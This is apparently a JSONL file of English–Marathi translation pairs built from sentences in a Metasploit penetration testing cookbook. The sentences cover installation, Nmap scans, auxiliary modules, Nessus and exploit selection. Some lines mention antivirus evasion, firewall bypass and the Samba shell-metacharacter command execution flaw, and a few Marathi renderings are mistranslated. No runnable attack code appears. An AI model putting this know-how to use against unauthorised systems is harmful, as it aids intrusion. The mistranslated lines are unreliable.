Cyber-Parallel-Dataset-Indic / mr /Metasploit Penetration Testing Cookbook 3rd Edi_indic_translation.jsonl
| {"en":"Metasploit is a powerful framework for penetration testing.","translation":"मेटॅस्प्लाइट हे प्रवेश परीक्षणासाठी एक शक्तिशाली साधन आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"This book teaches how to evade antivirus software.","translation":"हे पुस्तक अँटीव्हायरस सॉफ्टवेअर कसे टाळायचे हे शिकवते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Install Metasploit on your Kali Linux system.","translation":"तुमच्या काली लिनक्स प्रणालीवर मेटॅस्प्लाइट स्थापित करा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The book covers various penetration testing techniques.","translation":"हे पुस्तक विविध प्रवेश परीक्षा तंत्रांचा समावेश करते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Exploiting vulnerabilities requires careful planning.","translation":"vulnerability चा फायदा घेण्यासाठी काळजीपूर्वक योजना आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"MSFvenom is used to generate payloads.","translation":"MSFvenom चा उपयोग पेलोड तयार करण्यासाठी केला जातो.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Client-side exploitation is a common attack vector.","translation":"क्लायंट-साइड शोषण हे एक सामान्य हल्ल्याचे माध्यम आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The Social-Engineer Toolkit is a useful tool.","translation":"सोशल-इंजिनियर टूलकिट हे एक उपयुक्त साधन आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Understanding module structure is important.","translation":"मॉड्यूलची रचना समजून घेणे महत्त्वाचे आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Wireless network penetration testing is discussed.","translation":"वायरलेस नेटवर्क प्रवेश परीक्षा वर चर्चा केली आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Cloud penetration testing is a growing field.","translation":"क्लाउड प्रवेश परीक्षा एक वाढते क्षेत्र आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Always follow best practices for security.","translation":"सुरक्षेसाठी नेहमी सर्वोत्तम पद्धतींचे पालन करा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"This book helps you think like an adversary.","translation":"हे पुस्तक तुम्हाला विरोधकासारखे विचार करण्यास मदत करते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Penetration testing requires ethical considerations.","translation":"प्रवेश परीक्षणासाठी नैतिक विचार आवश्यक आहेत.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The book provides detailed examples.","translation":"हे पुस्तक विस्तृत उदाहरणे पुरवते.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Learn how to use Meterpreter effectively.","translation":"मीटरप्रेटरचा प्रभावीपणे वापर कसा करायचा ते शिका.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Bypass firewalls and exploit complex environments.","translation":"फायरवॉल बायपास करा आणि जटिल वातावरणाचा फायदा घ्या.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"The third edition includes updated information.","translation":"तिसऱ्या आवृत्तीत अद्ययावत माहिती समाविष्ट आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"This guide is for both beginners and experts.","translation":"हे मार्गदर्शन नवशिक्या आणि तज्ञांसाठी आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Master the art of penetration testing with Metasploit.","translation":"मेटॅस्प्लाइट वापरून प्रवेश परीक्षेची कला master करा.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Nmap is the most powerful and preferred scanner for security professionals.","translation":"सुरक्षा व्यावसायिकांसाठी एनमॅप हे सर्वात शक्तिशाली आणि आवडते स्कॅनर आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The usage of Nmap varies from novice to an advanced level.","translation":"एनमॅपचा वापर नवशिक्यांपासून ते प्रगत स्तरापर्यंत बदलतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We will analyze the various scan techniques in detail.","translation":"आम्ही विविध स्कॅन तंत्रांचे तपशीलवार विश्लेषण करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Getting ready You run Nmap directly from msfconsole.","translation":"तयार व्हा. तुम्ही msfconsole मधून थेट Nmap चालवता.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"However, if you want to import the results into the Metasploit database, you need to run the Nmap scan using the -oX flag.","translation":"परंतु, जर तुम्हाला परिणाम मेटास्प्लॉइट डेटाबेसमध्ये आयात करायचे असतील, तर तुम्हाला -oX फ्लॅग वापरून Nmap स्कॅन चालवावे लागेल.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"The TCP connect scan is the most basic and default scan type in Nmap.","translation":"TCP कनेक्ट स्कॅन हे एनमॅपमधील सर्वात मूलभूत आणि डीफॉल्ट स्कॅन प्रकार आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"It follows the three-way handshake process to detect the open ports on the target machine.","translation":"हे लक्ष्य मशीनवरील खुले पोर्ट शोधण्यासाठी तीन-मार्ग हँडशेक प्रक्रियेचे अनुसरण करते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's perform this scan on one of our targets.","translation":"चला, हे स्कॅन आपल्या लक्ष्यांपैकी एकावर करूया.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The SYN scan is considered a stealth scanning technique.","translation":"SYN स्कॅनला एक गुप्त स्कॅनिंग तंत्र मानले जाते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"It is also called half-open scanning.","translation":"याला अर्ध-खुले स्कॅनिंग देखील म्हणतात.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The –sS parameter will instruct Nmap to perform a SYN scan on the target machine.","translation":"–sS पॅरामीटर एनमॅपला लक्ष्य मशीनवर SYN स्कॅन करण्यासाठी सूचना देईल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The output of both TCP connect and the SYN scan are similar in most of the cases.","translation":"TCP कनेक्ट आणि SYN स्कॅनचा आउटपुट बहुतेक प्रकरणांमध्ये समान असतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The UDP scan is the scanning technique to identify open UDP ports on the target.","translation":"UDP स्कॅन हे लक्ष्यवरील खुले UDP पोर्ट ओळखण्याचे स्कॅनिंग तंत्र आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"0-byte UDP packets are sent to the target machine.","translation":"0-बाइट UDP पॅकेट लक्ष्य मशीनवर पाठवले जातात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We have analyzed three different types of Nmap scans.","translation":"आम्ही तीन वेगवेगळ्या प्रकारच्या एनमॅप स्कॅनचे विश्लेषण केले आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"During a penetration test, the scanning process can provide lots of useful results.","translation":"पेनेट्रेशन टेस्ट दरम्यान, स्कॅनिंग प्रक्रिया खूप उपयुक्त परिणाम देऊ शकते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The TCP connect scan is the most basic scanning technique.","translation":"TCP कनेक्ट स्कॅन हे सर्वात मूलभूत स्कॅनिंग तंत्र आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"A SYN scan is another type of TCP scan.","translation":"SYN स्कॅन हा TCP स्कॅनचा दुसरा प्रकार आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"UDP scanning is a connectionless scanning technique.","translation":"UDP स्कॅनिंग हे कनेक्शनलेस स्कॅनिंग तंत्र आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"There are some advanced options provided by Nmap, apart from port scanning.","translation":"पोर्ट स्कॅनिंगव्यतिरिक्त, एनमॅपद्वारे काही प्रगत पर्याय प्रदान केले जातात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Metasploit is a leading penetration testing tool.","translation":"मेटॅस्प्लॉइट हे एक प्रमुख प्रवेश परीक्षा (पेनिट्रेशन टेस्टिंग) साधन आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Install Metasploit on macOS using the provided installer package.","translation":"दिलेल्या इन्स्टॉलर पॅकेजचा वापर करून मॅकओएसवर मेटॅस्प्लॉइट स्थापित करा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Kali Linux comes with Metasploit pre-installed.","translation":"काली लिनक्समध्ये मेटॅस्प्लॉइट पूर्वनिर्धारितपणे स्थापित केलेले येते.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The Metasploit Framework has a modular architecture.","translation":"मेटॅस्प्लॉइट फ्रेमवर्कमध्ये मॉड्यूलर आर्किटेक्चर आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Exploits, payloads, and encoders are separate modules.","translation":"एक्सप्लॉइट्स, पेलोड्स आणि एन्कोडर्स हे स्वतंत्र मॉड्यूल आहेत.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Use msfconsole for the best support and features.","translation":"सर्वोत्तम समर्थन आणि वैशिष्ट्यांसाठी एमएसएफकन्सोल वापरा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The web interface is available for Metasploit Community, Express, and Pro.","translation":"मेटॅस्प्लॉइट कम्युनिटी, एक्सप्रेस आणि प्रो साठी वेब इंटरफेस उपलब्ध आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Download the Metasploit Framework installer from the official website.","translation":"अधिकृत वेबसाइटवरून मेटॅस्प्लॉइट फ्रेमवर्क इन्स्टॉलर डाउनलोड करा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Disable antivirus during Metasploit installation.","translation":"मेटॅस्प्लॉइट इन्स्टॉलेशन दरम्यान अँटीव्हायरस अक्षम करा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The quick installation script imports the Rapid7 signing key.","translation":"त्वरित इन्स्टॉलेशन स्क्रिप्ट रॅपिड7 स्वाक्षरी की आयात करते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Update Kali Linux regularly for security updates.","translation":"सुरक्षा अद्यतनांसाठी काली लिनक्स नियमितपणे अपडेट करा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Creating a penetration testing lab is essential for practice.","translation":"सराव करण्यासाठी प्रवेश परीक्षा (पेनिट्रेशन टेस्टिंग) प्रयोगशाळा तयार करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Virtual machines provide portability and flexibility.","translation":"व्हर्च्युअल मशीन पोर्टेबिलिटी आणि लवचिकता प्रदान करतात.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Set up a custom network in VMware Fusion.","translation":"VMware Fusion मध्ये कस्टम नेटवर्क सेट करा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Configure SSH to use cryptographic keys for secure login.","translation":"सुरक्षित लॉग इनसाठी क्रिप्टोग्राफिक की वापरण्यासाठी SSH कॉन्फिगर करा.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Use the 'passwd' command to change the root password.","translation":"रूट पासवर्ड बदलण्यासाठी 'पासवर्ड' कमांड वापरा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The msfdb command manages the Metasploit database.","translation":"एमएसएफडीबी कमांड मेटॅस्प्लॉइट डेटाबेस व्यवस्थापित करते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Initialize the database using 'msfdb init'.","translation":"'एमएसएफडीबी इनिट' वापरून डेटाबेस सुरू करा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The database.yml file contains database configuration details.","translation":"डेटाबेस.वायएमएल फाईलमध्ये डेटाबेस कॉन्फिगरेशन तपशील आहेत.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Connect to the database using the db_status command in msfconsole.","translation":"एमएसएफकन्सोलमध्ये डीबी_स्टेटस कमांड वापरून डेटाबेसशी कनेक्ट व्हा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"If you want the database to connect every time you launch msfconsole, copy the database configuration file to the .msf4 directory.","translation":"जर तुम्हाला msfconsole सुरू करताच डेटाबेस कनेक्ट करायचा असेल, तर डेटाबेस कॉन्फिगरेशन फाइल .msf4 निर्देशिकेत कॉपी करा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Workspaces in Metasploit are used to separate datasets, allowing you to stay organized.","translation":"मेटॅस्प्लॉइटमधील वर्कस्पेस डेटासेट वेगळे करण्यासाठी वापरले जातात, ज्यामुळे तुम्ही व्यवस्थित राहू शकता.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"It is a good idea to create a new workspace to organize all your collected data before starting a new penetration test.","translation":"नवीन पेनिट्रेशन टेस्ट सुरू करण्यापूर्वी, तुमचा सर्व डेटा व्यवस्थित करण्यासाठी नवीन वर्कस्पेस तयार करणे चांगली कल्पना आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The default workspace is selected when connecting to the database, which is represented by the * character before its name.","translation":"डेटाबेसशी कनेक्ट करताना डीफॉल्ट वर्कस्पेस निवडला जातो, जो त्याच्या नावाच्या आधी * अक्षराने दर्शविला जातो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To display the usage for the workspace command, use the -h option.","translation":"वर्कस्पेस कमांडचा वापर दर्शविण्यासाठी, -h पर्याय वापरा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"To add a new workspace, use the -a option followed by the name of the workspace.","translation":"नवीन वर्कस्पेस जोडण्यासाठी, -a पर्याय वापरा, त्यानंतर वर्कस्पेसचे नाव लिहा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"To list the available workspaces, simply type the workspace command.","translation":"उपलब्ध वर्कस्पेसची यादी पाहण्यासाठी, फक्त वर्कस्पेस कमांड टाइप करा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"To delete a workspace, use the -d option followed by the name of the workspace.","translation":"वर्कस्पेस हटवण्यासाठी, -d पर्याय वापरा, त्यानंतर वर्कस्पेसचे नाव लिहा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"To change the current workspace, use the workspace command followed by the name of the workspace you want to change to.","translation":"सध्याचा वर्कस्पेस बदलण्यासाठी, वर्कस्पेस कमांड वापरा, त्यानंतर तुम्हाला ज्या वर्कस्पेसमध्ये बदलायचे आहे त्याचे नाव लिहा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To rename a workspace, use the workspace command with the -r option followed by the old workspace name and the new workspace name.","translation":"वर्कस्पेसचे नाव बदलण्यासाठी, वर्कस्पेस कमांड -r पर्यायासह वापरा, त्यानंतर जुने वर्कस्पेस नाव आणि नवीन वर्कस्पेस नाव लिहा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Once the database is configured, we can start using it.","translation":"डेटाबेस कॉन्फिगर झाल्यावर, आपण ते वापरणे सुरू करू शकतो.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"First, we will take a look at how to import data from external tools using the db_import command.","translation":"सुरुवातीला, db_import कमांड वापरून बाह्य साधनांमधून डेटा कसा आयात करायचा, हे पाहूया.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To test the db_import command, we will use the nmap command, a free security scanner.","translation":"db_import कमांडची चाचणी घेण्यासाठी, आपण nmap कमांड वापरू, जे एक विनामूल्य सुरक्षा स्कॅनर आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Alternatively, you can run the db_nmap command directly from msfconsole, and the results will be saved in your current database.","translation":"पर्यायीरित्या, तुम्ही db_nmap कमांड थेट msfconsole मधून चालवू शकता आणि परिणाम तुमच्या सध्याच्या डेटाबेसमध्ये सेव्ह केले जातील.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Now that we have data in the database, we can start by using the hosts command to display all the hosts stored in our current workspace.","translation":"आता आपल्या डेटाबेसमध्ये डेटा आहे, आपण hosts कमांड वापरून आपल्या सध्याच्या वर्कस्पेसमध्ये संग्रहित केलेले सर्व होस्ट प्रदर्शित करणे सुरू करू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Using the -c option, we can select which columns to display.","translation":"-c पर्याय वापरून, आपण कोणती स्तंभे (columns) प्रदर्शित करायची आहेत ते निवडू शकतो.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"With the -S option, we can search for specific strings, such as the OS name.","translation":"-S पर्यायासह, आपण विशिष्ट स्ट्रिंग्ज शोधू शकतो, जसे की OS चे नाव.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The services command allows us to display the services running on the hosts.","translation":"services कमांड आपल्याला होस्टवर चालणाऱ्या सेवा (services) प्रदर्शित करण्यास अनुमती देते.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Using the search command without any options displays all the available services.","translation":"कोणतेही पर्याय (options) नसताना search कमांड वापरल्यास सर्व उपलब्ध सेवा प्रदर्शित होतात.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"By combining multiple options, you can search just a specific host and only display the columns you want.","translation":"एकाधिक पर्याय एकत्र करून, तुम्ही फक्त एका विशिष्ट होस्टसाठी शोधू शकता आणि तुम्हाला पाहिजे असलेले स्तंभ (columns) प्रदर्शित करू शकता.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The scan results, as with the previous auxiliary modules, will get stored in the Metasploit database.","translation":"स्कॅनचे निकाल, मागील सहाय्यक मॉड्यूल्सप्रमाणे, मेटॅस्प्लाइट डेटाबेसमध्ये संग्रहित केले जातील.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The SMTP User Enumeration Utility auxiliary module, through the implementation of these SMTP commands, can reveal a list of valid users.","translation":"एसएमटीपी यूजर एन्यूमरेशन युटिलिटी सहाय्यक मॉड्यूल, या एसएमटीपी कमांड्सच्या अंमलबजावणीद्वारे, वैध वापरकर्त्यांची यादी उघड करू शकते.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To run the module, set the target address range, the number of concurrent threads, and type run.","translation":"मॉड्यूल चालवण्यासाठी, लक्ष्य पत्ता श्रेणी, एकाच वेळी चालणाऱ्या थ्रेड्सची संख्या सेट करा आणि रन टाईप करा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The output reveals a list of valid users for the Metasploitable 2 target.","translation":"आउटपुट मेटॅस्प्लाइटेबल 2 लक्ष्यासाठी वैध वापरकर्त्यांची यादी दर्शवते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"SNMP sweeps are often a good indicator in finding a lot of information about a specific system.","translation":"एसएनएमपी स्वीप्स अनेकदा विशिष्ट प्रणालीबद्दल बरीच माहिती शोधण्यात चांगला निर्देशक असतात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Metasploit has a built-in auxiliary module specifically for sweeping SNMP devices.","translation":"मेटॅस्प्लाइटमध्ये एसएनएमपी उपकरणांचे स्कॅनिंग करण्यासाठी खास अंगभूत सहाय्यक मॉड्यूल आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"First, read-only and read-write community strings play an important role.","translation":"सुरुवातीला, केवळ-वाचन आणि वाचन-लेखन समुदाय स्ट्रिंग महत्त्वाची भूमिका बजावतात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"If dealing with Windows-based devices configured with SNMP, often at times with the RO/RW community strings, we can extract patch levels.","translation":"जर विंडोज-आधारित उपकरणांशी व्यवहार करत असाल जे एसएनएमपीसह कॉन्फिगर केलेले आहेत, अनेकदा आरओ/आरडब्ल्यू समुदाय स्ट्रिंगसह, तर आपण पॅच लेव्हल काढू शकतो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"The HTTP Robots.txt Content Scanner auxiliary module will search for robots.txt files and analyze their content.","translation":"एचटीटीपी रोबोट्स.txt सामग्री स्कॅनर सहाय्यक मॉड्यूल robots.txt फायली शोधेल आणि त्यांची सामग्रीचे विश्लेषण करेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"If the PUT method can be used by any unauthenticated remote user, arbitrary web pages can be inserted.","translation":"जर PUT पद्धत कोणत्याही असंबंधित रिमोट वापरकर्त्याद्वारे वापरली जाऊ शकते, तर यादृच्छिक वेब पृष्ठे घातली जाऊ शकतात.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To run the HTTP SSL Certificate Checker auxiliary module, we need to specify the target host and the target port.","translation":"एचटीटीपी एसएसएल सर्टिफिकेट चेकर सहाय्यक मॉड्यूल चालवण्यासाठी, आपल्याला लक्ष्य होस्ट आणि लक्ष्य पोर्ट निर्दिष्ट करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The WinRM Authentication Method Detection auxiliary module sends a request to an HTTP/HTTPS service.","translation":"WinRM प्रमाणीकरण पद्धत शोध सहाय्यक मॉड्यूल HTTP/HTTPS सेवेला विनंती पाठवते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To use the WinRM Authentication Method Detection auxiliary module, set the target address range in RHOSTS and type run.","translation":"WinRM प्रमाणीकरण पद्धत शोध सहाय्यक मॉड्यूल वापरण्यासाठी, RHOSTS मध्ये लक्ष्य पत्ता श्रेणी सेट करा आणि रन टाईप करा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To run the WinRM Command Runner auxiliary module, we need to set the targets IP address, the Windows command to run, the username Administrator, and password vagrant.","translation":"WinRM कमांड रनर सहाय्यक मॉड्यूल चालवण्यासाठी, आपल्याला लक्ष्य आयपी पत्ता, विंडोज कमांड, वापरकर्तानाव प्रशासक आणि पासवर्ड व्हॅग्रंट सेट करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Port scanning has been extended to several other tools which further enhances the process of scanning and information gathering.","translation":"पोर्ट स्कॅनिंग इतर अनेक साधनांपर्यंत विस्तारित केले गेले आहे, जे स्कॅनिंग आणि माहिती संकलनाची प्रक्रिया अधिक सुधारते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Nessus is one of the most widely used vulnerability scanners.","translation":"नेसूस हे सर्वात जास्त वापरले जाणारे असुरक्षा स्कॅनर्सपैकी एक आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"To use Nessus for the first time, you will have to register and get a registration code from the Nessus website.","translation":"नेसूसचा प्रथम वापर करण्यासाठी, आपल्याला नोंदणी करावी लागेल आणि नेसूस वेबसाइटवरून नोंदणी कोड मिळवावा लागेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To connect to Nessus, use the nessus_connect command with the Nessus credentials, hostname, port (if not using the default port 8834), and verify the SSL certificate.","translation":"नेसूसशी कनेक्ट होण्यासाठी, नेसूस क्रेडेन्शियल्स, होस्टनेम, पोर्ट (डीफॉल्ट पोर्ट 8834 वापरत नसल्यास) आणि एसएसएल प्रमाणपत्र सत्यापित करून nessus_connect कमांड वापरा.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To create a new Nessus scan, we use the nessus_scan_new command followed by the UUID of the policy we want to use, the name for the scan, description, and the target.","translation":"नवीन नेसूस स्कॅन तयार करण्यासाठी, आम्ही nessus_scan_new कमांड वापरतो, त्यानंतर आम्हाला वापरायची असलेली पॉलिसीचा UUID, स्कॅनचे नाव, वर्णन आणि लक्ष्य.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"When the scan is complete, we can import scan results into Metasploit using the nessus_db_import command.","translation":"स्कॅन पूर्ण झाल्यावर, आम्ही nessus_db_import कमांड वापरून स्कॅनचे निकाल मेटॅस्प्लाइटमध्ये आयात करू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Unpatched systems are a safe haven for hackers.","translation":"अपडेट नसलेली प्रणाली हॅकर्ससाठी सुरक्षित आश्रयस्थान आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Regularly patching and updating the operating system is essential.","translation":"ऑपरेटिंग सिस्टम नियमितपणे पॅच करणे आणि अपडेट करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"In this chapter, we will focus on vulnerabilities.","translation":"या अध्यायात, आम्ही असुरक्षिततेवर लक्ष केंद्रित करू.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Pentesters start looking for available exploits.","translation":"पेनिट्रेशन परीक्षक उपलब्ध शोषणांचा शोध घेतात.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"This chapter will be the first step toward penetrating our target.","translation":"हे प्रकरण आपल्या लक्ष्यावर प्रवेश करण्याचे पहिले पाऊल असेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We will focus on some of the most widely used operating systems.","translation":"आम्ही सर्वात जास्त वापरल्या जाणाऱ्या काही ऑपरेटिंग सिस्टमवर लक्ष केंद्रित करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We will also look at how to use exploits and set up their parameters.","translation":"आम्ही शोषण कसे वापरावे आणि त्याचे मापदंड कसे सेट करावे यावर देखील विचार करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"It is essential to understand the usage of exploits.","translation":"शोषणाचा वापर समजून घेणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The first thing required is to scan the target for open ports and services.","translation":"आवश्यक असलेली पहिली गोष्ट म्हणजे लक्ष्यित प्रणालीतील खुले पोर्ट आणि सेवा स्कॅन करणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Once you have gathered enough information, the next step is to select exploits accordingly.","translation":"एकदा आपण पुरेशी माहिती गोळा केली की, पुढील पायरी म्हणजे त्यानुसार शोषण निवडणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"MSFconsole is the most popular interface for the Metasploit Framework.","translation":"MSFconsole हे Metasploit Framework साठी सर्वात लोकप्रिय इंटरफेस आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To display the help menu, simply type the help command inside msfconsole.","translation":"मदत मेनू प्रदर्शित करण्यासाठी, msfconsole मध्ये फक्त help कमांड टाइप करा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Probably the most helpful command to start with is the search command.","translation":"सुरुवात करण्यासाठी सर्वात उपयुक्त कमांड म्हणजे search कमांड.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Linux is one of the most widely used operating systems.","translation":"Linux हे सर्वात जास्त वापरले जाणारे ऑपरेटिंग सिस्टमपैकी एक आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"We will be using the Metasploitable 2, for our vulnerable Linux machine.","translation":"आम्ही आमच्या असुरक्षित Linux मशीनसाठी Metasploitable 2 वापरू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Now that we know the version of the Samba daemon running, we can search for vulnerabilities.","translation":"आता आपल्याला Samba डेमनची आवृत्ती माहीत आहे, आम्ही असुरक्षिततेचा शोध घेऊ शकतो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"By doing some research online for Common Vulnerabilities and Exposures (CVE) related to Samba.","translation":"Samba शी संबंधित सामान्य असुरक्षितता आणि एक्सपोजर (CVE) साठी ऑनलाइन संशोधन करून.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To select the exploit, employ the use command followed by the exploit name.","translation":"शोषणाची निवड करण्यासाठी, exploit नावाच्या पाठोपाठ use कमांड वापरा.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"This module exploits a command execution vulnerability in Samba versions.","translation":"हे मॉड्यूल Samba च्या आवृत्त्यांमधील कमांड अंमलबजावणीतील असुरक्षिततेचा फायदा घेते.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"By specifying a username containing shell meta characters, attackers can execute arbitrary commands.","translation":"शेल मेटा कॅरेक्टर्स असलेला वापरकर्तानाव निर्दिष्ट करून, हल्लेखोर मनमानी कमांड कार्यान्वित करू शकतात.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"The C:\\Users\\Public\\Documents\\jack_of_hearts.docx file gets downloaded in the root folder of our attacking machine.","translation":"C:\\Users\\Public\\Documents\\jack_of_hearts.docx ही फाईल आपल्या हल्ला करणाऱ्या मशीनच्या रूट फोल्डरमध्ये डाउनलोड होते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Similarly, we can use the upload command to send any file to the target machine.","translation":"त्याचप्रमाणे, आपण कोणतीही फाईल लक्ष्यित मशीनवर पाठवण्यासाठी अपलोड कमांड वापरू शकतो.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
